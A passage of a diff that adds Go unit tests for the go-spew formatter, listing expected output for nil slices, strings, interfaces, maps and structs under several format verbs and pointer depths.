+ addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2)
+ addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2)
+ addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"")
+
+ // Nil slice.
+ var v4 []int
+ nv4 := (*[]int)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "[]int"
+ v4s := ""
+ addFormatterTest("%v", v4, v4s)
+ addFormatterTest("%v", pv4, "<*>"+v4s)
+ addFormatterTest("%v", &pv4, "<**>"+v4s)
+ addFormatterTest("%+v", nv4, "")
+ addFormatterTest("%+v", v4, v4s)
+ addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s)
+ addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%+v", nv4, "")
+ addFormatterTest("%#v", v4, "("+v4t+")"+v4s)
+ addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s)
+ addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s)
+ addFormatterTest("%#v", nv4, "(*"+v4t+")"+"")
+ addFormatterTest("%#+v", v4, "("+v4t+")"+v4s)
+ addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s)
+ addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"")
+}
+
+func addStringFormatterTests() {
+ // Standard string.
+ v := "test"
+ nv := (*string)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "string"
+ vs := "test"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+}
+
+func addInterfaceFormatterTests() {
+ // Nil interface.
+ var v interface{}
+ nv := (*interface{})(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "interface {}"
+ vs := ""
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Sub-interface.
+ v2 := interface{}(uint16(65535))
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "uint16"
+ v2s := "65535"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+}
+
+func addMapFormatterTests() {
+ // Map with string keys and int vals.
+ v := map[string]int{"one": 1, "two": 2}
+ nilMap := map[string]int(nil)
+ nv := (*map[string]int)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "map[string]int"
+ vs := "map[one:1 two:2]"
+ vs2 := "map[two:2 one:1]"
+ addFormatterTest("%v", v, vs, vs2)
+ addFormatterTest("%v", pv, "<*>"+vs, "<*>"+vs2)
+ addFormatterTest("%v", &pv, "<**>"+vs, "<**>"+vs2)
+ addFormatterTest("%+v", nilMap, "")
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%+v", v, vs, vs2)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs, "<*>("+vAddr+")"+vs2)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs,
+ "<**>("+pvAddr+"->"+vAddr+")"+vs2)
+ addFormatterTest("%+v", nilMap, "")
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs, "("+vt+")"+vs2)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs, "(*"+vt+")"+vs2)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs, "(**"+vt+")"+vs2)
+ addFormatterTest("%#v", nilMap, "("+vt+")"+"")
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs, "("+vt+")"+vs2)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs,
+ "(*"+vt+")("+vAddr+")"+vs2)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs,
+ "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs2)
+ addFormatterTest("%#+v", nilMap, "("+vt+")"+"")
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Map with custom formatter type on pointer receiver only keys and vals.
+ v2 := map[pstringer]pstringer{"one": "1"}
+ nv2 := (*map[pstringer]pstringer)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "map[spew_test.pstringer]spew_test.pstringer"
+ v2s := "map[stringer one:stringer 1]"
+ if spew.UnsafeDisabled {
+ v2s = "map[one:1]"
+ }
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"")
+
+ // Map with interface keys and values.
+ v3 := map[interface{}]interface{}{"one": 1}
+ nv3 := (*map[interface{}]interface{})(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "map[interface {}]interface {}"
+ v3t1 := "string"
+ v3t2 := "int"
+ v3s := "map[one:1]"
+ v3s2 := "map[(" + v3t1 + ")one:(" + v3t2 + ")1]"
+ addFormatterTest("%v", v3, v3s)
+ addFormatterTest("%v", pv3, "<*>"+v3s)
+ addFormatterTest("%v", &pv3, "<**>"+v3s)
+ addFormatterTest("%+v", nv3, "")
+ addFormatterTest("%+v", v3, v3s)
+ addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+ addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%+v", nv3, "")
+ addFormatterTest("%#v", v3, "("+v3t+")"+v3s2)
+ addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2)
+ addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"")
+ addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2)
+ addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2)
+ addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2)
+ addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"")
+
+ // Map with nil interface value
+ v4 := map[string]interface{}{"nil": nil}
+ nv4 := (*map[string]interface{})(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "map[string]interface {}"
+ v4t1 := "interface {}"
+ v4s := "map[nil:]"
+ v4s2 := "map[nil:(" + v4t1 + ")]"
+ addFormatterTest("%v", v4, v4s)
+ addFormatterTest("%v", pv4, "<*>"+v4s)
+ addFormatterTest("%v", &pv4, "<**>"+v4s)
+ addFormatterTest("%+v", nv4, "")
+ addFormatterTest("%+v", v4, v4s)
+ addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s)
+ addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%+v", nv4, "")
+ addFormatterTest("%#v", v4, "("+v4t+")"+v4s2)
+ addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s2)
+ addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s2)
+ addFormatterTest("%#v", nv4, "(*"+v4t+")"+"")
+ addFormatterTest("%#+v", v4, "("+v4t+")"+v4s2)
+ addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s2)
+ addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s2)
+ addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"")
+}
+
+func addStructFormatterTests() {
+ // Struct with primitives.
+ type s1 struct {
+ a int8
+ b uint8
+ }
+ v := s1{127, 255}
+ nv := (*s1)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "spew_test.s1"
+ vt2 := "int8"
+ vt3 := "uint8"
+ vs := "{127 255}"
+ vs2 := "{a:127 b:255}"
+ vs3 := "{a:(" + vt2 + ")127 b:(" + vt3 + ")255}"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%+v", v, vs2)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs2)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs2)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs3)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs3)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs3)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs3)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs3)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs3)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Struct that contains another struct.
+ type s2 struct {
+ s1 s1
+ b bool
+ }
+ v2 := s2{s1{127, 255}, true}
+ nv2 := (*s2)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "spew_test.s2"
+ v2t2 := "spew_test.s1"
+ v2t3 := "int8"
+ v2t4 := "uint8"
+ v2t5 := "bool"
+ v2s := "{{127 255} true}"
+ v2s2 := "{s1:{a:127 b:255} b:true}"
+ v2s3 := "{s1:(" + v2t2 + "){a:(" + v2t3 + ")127 b:(" + v2t4 + ")255} b:(" +
+ v2t5 + ")true}"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%+v", v2, v2s2)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s2)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s2)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s3)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s3)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s3)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"